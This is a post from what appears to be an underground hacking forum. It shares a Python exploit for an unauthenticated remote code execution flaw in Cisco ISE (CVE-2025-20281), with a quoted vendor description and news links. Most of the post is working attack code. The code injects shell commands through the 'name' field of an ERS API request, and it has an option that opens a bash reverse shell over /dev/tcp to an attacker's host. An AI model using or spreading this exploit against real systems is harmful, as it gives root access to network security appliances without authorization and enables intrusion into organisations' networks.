Upgrade your account to access Premium section
Access to DarkForums Private Archive Telegram Channel
Old Telegram is Banned Join our new Telegram Channel

Cisco ISE - Unauthenticated RCE
by antisocial - 10-07-25, 12:56 AM
GOD Offline
GOD

Posts 7
Threads 5
Joined Apr 2025
Reputation 14
3 Months
#1
10-07-25, 12:56 AM
Thought i would share this since its really not that talked about but still pretty interesting, if you have anything you want to add please do so : )

Vulnerability description:
"A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device."

Articles:
https://thehackernews.com/2025/07/critic...ified.html
https://www.theregister.com/2025/06/26/p...fixes_two/
https://www.securityweek.com/critical-ci...execution/
https://www.bleepingcomputer.com/news/se...es-engine/
https://thehackernews.com/2025/06/critic...d-ise.html
https://securityaffairs.com/179362/secur...l-rce.html
Code:
#!/usr/bin/env python3
import requests
import urllib3
import argparse

urllib3.disable_warnings()

def exploit_cve_2025_20281_unauth(target, cmd):
    url = f"https://{target}:9060/ers/sdk#_"
    #url = f"https://{target}/ers/sdk#_"
    payload = {
        "InternalUser": {
            "name": f"pwn; {cmd}; #",
            "password": "x",         # dummy, ignored by vuln
            "changePassword": False
        }
    }
    r = requests.post(url, json=payload, verify=False)
    print(f"[+] HTTP {r.status_code}\n{r.text}\n")

def build_reverse_shell(lhost, lport):
    return f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"

if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS"
    )
    parser.add_argument('target', help="IP or hostname of the ISE PAN")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument(
        '--whoami',
        action='store_true',
        help="Run 'whoami' and print the result"
    )
    group.add_argument(
        '--reverse',
        nargs=2,
        metavar=('LHOST', 'LPORT'),
        help="Spawn a bash reverse shell to LHOST:LPORT"
    )

    args = parser.parse_args()

    if args.whoami:
        cmd = 'whoami'
    else:
        lhost, lport = args.reverse
        cmd = build_reverse_shell(lhost, lport)

    print(f"[*] Target: {args.target}")
    print(f"[*] Command: {cmd}\n")
    exploit_cve_2025_20281_unauth(args.target, cmd)
 
Reply


Forum Jump:


 Users browsing this thread: 1 Guest(s)